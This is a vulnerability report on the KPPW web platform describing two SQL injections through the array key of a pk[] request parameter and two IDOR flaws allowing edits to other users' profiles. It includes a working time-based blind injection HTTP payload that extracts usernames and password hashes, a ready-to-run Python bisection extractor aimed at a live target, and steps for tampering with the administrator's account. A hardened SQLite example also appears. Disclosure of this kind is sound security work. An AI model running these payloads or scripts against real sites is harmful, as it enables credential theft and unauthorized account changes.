### Brief description:
KPPW latest version SQL injection vulnerability No. 3 (two SQL injections and two unauthorized-operation flaws), script attached
### Details:
First SQL injection
File /control/user/account_basic.php:
```
if ($intUserRole === 2) {
    ......
} else {
    $intAuthStatus = keke_auth_fac_class::auth_check("realname", $gUid);
    if (isset($formhash) && kekezu::submitcheck($formhash)) {
        if (strtotime($birthday) >= strtotime(date('Y-m-d', time()))) {
            // "birth date must not be later than or equal to today"
            $tips['errors']['birthday'] = '出生日期不得大于或等于当前日期';
            kekezu::show_msg($tips, NULL, NULL, NULL, 'error');
        }
        if (strtoupper(CHARSET) == 'GBK') {
            $truename = kekezu::utftogbk($truename);
        }
        $arrData = array(
            'indus_pid' => $indus_pid,
            'indus_id'  => $indus_id,
            'truename'  => $truename,
            'sex'       => $sex,
            'birthday'  => $birthday,
        );
        // $pk is not set anywhere in this scope: it arrives straight from the
        // request, because the framework registers request parameters as globals.
        $objSpaceT->save($arrData, $pk);
        unset($objSpaceT);
        kekezu::show_msg('已保存', NULL, NULL, NULL, 'ok'); // "saved"
    }
}
```
When the basic profile is saved, the variable $pk is passed into save().
Following save() into /lib/inc/keke_table_class.php:
```
function save($fields, $pk = array()) {
    foreach ($fields as $k => $v) {
        $kk = ucfirst($k);
        $set_query = "set" . $kk;
        $this->_table_obj->$set_query($v);
    }
    // The first array KEY of $pk becomes the column name of the WHERE clause
    // and is concatenated raw; only the VALUE is wrapped in single quotes.
    $keys = array_keys($pk);
    $key  = $keys[0];
    if (!empty($pk[$key])) {
        $this->_table_obj->setWhere(" $key = '" . $pk[$key] . "'");
        $edit_query = "edit_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$edit_query();
    } else {
        $create_query = "create_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$create_query();
    }
    if ($res) {
        return $res;
    } else {
        return false;
    }
}
```
When $pk[$key] is non-empty, $key (the array index, not the value) is concatenated into the WHERE condition, and that condition is then executed by $edit_query as part of the UPDATE statement.
Because this system registers request parameters as global variables, the array key of $pk is fully attacker-controlled, and it is neither quoted nor escaped before being placed in the query. The result is SQL injection.
Second SQL injection
File /control/user/account_contact.php:
```
if (isset($formhash) && kekezu::submitcheck($formhash)) {
    $arrData = array(
        'email'    => $email,
        'mobile'   => $mobile,
        'qq'       => $qq,
        'msn'      => $msn,
        'phone'    => $phone,
        'province' => $province,
        'city'     => $city,
        'area'     => $area
    );
    // same pattern: $pk comes from the request and reaches save() unchecked
    $intRes = $objSpaceT->save($arrData, $pk);
```
Here too the variable $pk flows into the SQL statement; the mechanism is the same as above, so this is a second SQL injection.
There is a second problem independent of the injection: the WHERE clause of this UPDATE is built from the uid supplied in the request (pk[uid]) rather than from the logged-in user's session.
Any authenticated user can therefore update any other user's basic profile simply by sending a different uid, which is an unauthorized operation (IDOR).
The same applies to the contact-information update, so any user's contact details can be modified as well.
In total: two SQL injections and two unauthorized operations.
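The two flaws above (the raw array key reaching the WHERE clause, and the WHERE clause trusting a request-supplied uid) can be reproduced offline. The following is an added example, not code from KPPW or from the report: it models keke_table_class::save() in Python over an in-memory SQLite table, shows that a crafted pk[] key rewrites the WHERE clause and that a plain pk[uid] with someone else's uid is enough for the IDOR, and sets a hardened update beside it that whitelists the column, binds the value, and pins the row to the session user. The table layout and the two sample users are constructed for the demo; since SQLite has no MySQL-style `#` comment, the injected key ends in `--` instead.

```python
import sqlite3

# Constructed sample data (not from the page): uid 1 is the administrator,
# uid 5529 is the low-privileged user sending the request.
SAMPLE_ROWS = [(1, "admin", "Administrator"), (5529, "tester", "Tester")]

# Hardened version: the only column a caller may name in pk[].
ALLOWED_PK_COLUMNS = {"uid"}


def make_db():
    """In-memory stand-in for the profile table save() writes to."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE witkey_space (uid INTEGER PRIMARY KEY, "
                 "username TEXT, truename TEXT)")
    conn.executemany("INSERT INTO witkey_space VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def truenames(conn):
    return dict(conn.execute("SELECT uid, truename FROM witkey_space"))


def vulnerable_update(conn, fields, pk):
    """Mirrors save(): the first array KEY of pk is the WHERE column, concatenated
    raw; only the VALUE gets single quotes. Returns the SQL that was executed."""
    key = list(pk.keys())[0]
    where = f" {key} = '{pk[key]}'"
    sets = ", ".join(f"{col} = '{val}'" for col, val in fields.items())
    sql = f"UPDATE witkey_space SET {sets} WHERE{where}"
    conn.execute(sql)
    conn.commit()
    return sql


def hardened_update(conn, fields, pk, session_uid):
    """Whitelist the column, bind every value, and ignore any uid the client
    sends that is not its own. Returns the number of rows updated."""
    key = next(iter(pk))
    if key not in ALLOWED_PK_COLUMNS:
        raise ValueError(f"pk column not allowed: {key!r}")
    if str(pk[key]) != str(session_uid):
        raise PermissionError("pk[uid] does not match the logged-in user")
    sets = ", ".join(f"{col} = ?" for col in fields)   # column names are fixed in code
    sql = f"UPDATE witkey_space SET {sets} WHERE {key} = ?"
    cur = conn.execute(sql, [*fields.values(), session_uid])
    conn.commit()
    return cur.rowcount


def demo():
    """Runs both vulnerable paths and the hardened one; returns the outcomes."""
    results = {}
    conn = make_db()
    # 1. Injection through the array key: the comment swallows " = '5529'".
    results["vuln_sql"] = vulnerable_update(conn, {"truename": "pwned"},
                                            {"uid=5529 OR 1=1 --": "5529"})
    results["vuln_injected"] = truenames(conn)
    # 2. IDOR needs no injection at all: just name the admin's uid.
    conn = make_db()
    vulnerable_update(conn, {"truename": "hijacked"}, {"uid": "1"})
    results["vuln_idor"] = truenames(conn)
    # 3. Hardened: both attacks are rejected, the user's own row still updates.
    conn = make_db()
    for label, pk in (("hard_key", {"uid=5529 OR 1=1 --": "5529"}),
                      ("hard_idor", {"uid": "1"})):
        try:
            hardened_update(conn, {"truename": "x"}, pk, session_uid=5529)
            results[label] = None
        except (ValueError, PermissionError) as exc:
            results[label] = type(exc).__name__
    results["hard_rows"] = hardened_update(conn, {"truename": "self"},
                                           {"uid": "5529"}, session_uid=5529)
    results["hard_final"] = truenames(conn)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The rowcount returned by the hardened path also doubles as a cheap regression check: an update that touches zero rows or more than one row for a single-user form is a sign that the WHERE clause is no longer pinned to the session.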
### Proof of vulnerability:
Sending the following request makes the response arrive about 5 seconds late (time-based blind injection through the pk[] array key):
```
POST /KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic
Content-Length: 239
Cookie: PHPSESSID=v8bshmlaa5qi5s47tnbpvulba5
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
formhash=6cb7d4&pk%5Buid%3d5529+and+if(mid((select+concat(username,password)+from+keke_witkey_member+limit+0,1),1,1)%3dchar(97),sleep(5),1)%23%5D=5529&indus_pid=-1&indus_id=-1&truename=%E4%B9%8C%E4%BA%91%E4%B8%80&sex=-1&birthday=1111-11-11
```
The statement as executed by the database:
![1.png](https://images.seebug.org/upload/201412/070150135b4361998e372b8b34c9dce5318195d6.png)
The injected SQL statement executed successfully.
sqlmap can be used to extract the data.
A simple script for dumping data is included as test code.
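As an added example that is not the report's attached script, the following Python client turns the PoC request above into a character-by-character extractor. It keeps the same endpoint path, form fields, table and subquery as the PoC, but generalizes the single `mid(...)=char(97)` comparison to `ascii(mid(...)) > threshold` so each character is found by bisection (seven requests instead of up to ninety-five). The target URL, cookie, formhash and uid are placeholders to be replaced; the offline oracle at the end answers from a constructed secret so the search logic can be exercised without a server.

```python
import time
import urllib.parse
import urllib.request

# Assumed target details: placeholders, except the path, field names and the
# subquery, which are taken from the PoC request.
TARGET = "http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic"
COOKIE = "PHPSESSID=REPLACE_ME"      # session of any registered user
FORMHASH = "REPLACE_ME"              # formhash from the account page
OWN_UID = 5529                       # uid of that user
SUBQUERY = "select concat(username,password) from keke_witkey_member limit 0,1"
DELAY = 5                            # seconds of sleep() that signal "true"
MAX_LEN = 64


def build_body(pos, threshold, uid=OWN_UID):
    """Form body whose pk[] array KEY carries the injection: MySQL sleeps when
    ascii(character at pos of the subquery result) > threshold."""
    key = (f"uid={uid} and if(ascii(mid(({SUBQUERY}),{pos},1))>{threshold},"
           f"sleep({DELAY}),1)#")
    fields = [
        ("formhash", FORMHASH),
        (f"pk[{key}]", str(uid)),
        ("indus_pid", "-1"), ("indus_id", "-1"),
        ("truename", "test"), ("sex", "-1"), ("birthday", "1111-11-11"),
    ]
    return urllib.parse.urlencode(fields)


def http_oracle(pos, threshold):
    """True if the server took at least DELAY seconds (needs a live target)."""
    req = urllib.request.Request(
        TARGET, data=build_body(pos, threshold).encode(), method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "X-Requested-With": "XMLHttpRequest", "Cookie": COOKIE})
    start = time.monotonic()
    try:
        urllib.request.urlopen(req, timeout=DELAY * 3).read()
    except Exception:
        pass  # an error page is fine; only the elapsed time matters
    return time.monotonic() - start >= DELAY


def find_char(oracle, pos, lo=0, hi=127):
    """Bisect the ASCII value at pos; 0 means the string has ended
    (MySQL ascii('') is 0 once mid() runs past the end)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, max_len=MAX_LEN):
    """Recover the subquery result character by character."""
    out = []
    for pos in range(1, max_len + 1):
        code = find_char(oracle, pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


def fake_oracle_for(secret):
    """Offline stand-in for http_oracle answering from a constructed secret."""
    def oracle(pos, threshold):
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return code > threshold
    return oracle


if __name__ == "__main__":
    print(extract(http_oracle))
```

Against a real target the timing oracle should be calibrated first (send one request with a condition known to be false and one known to be true) and DELAY set comfortably above the observed round-trip jitter; a mis-classified character corrupts every bisection step after it.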
For the unauthorized operation, register an ordinary user and log in.
Then edit the contact information, intercept the request, and change uid to 1, which is the administrator's uid.
![3.png](https://images.seebug.org/upload/201412/07021956e2ee4e0fd7cd2bc8c3b0143baf097cc5.png)
The administrator's contact information can then be modified at will:
![2.png](https://images.seebug.org/upload/201412/07021631f26170caa602493b4fede70636225c64.png)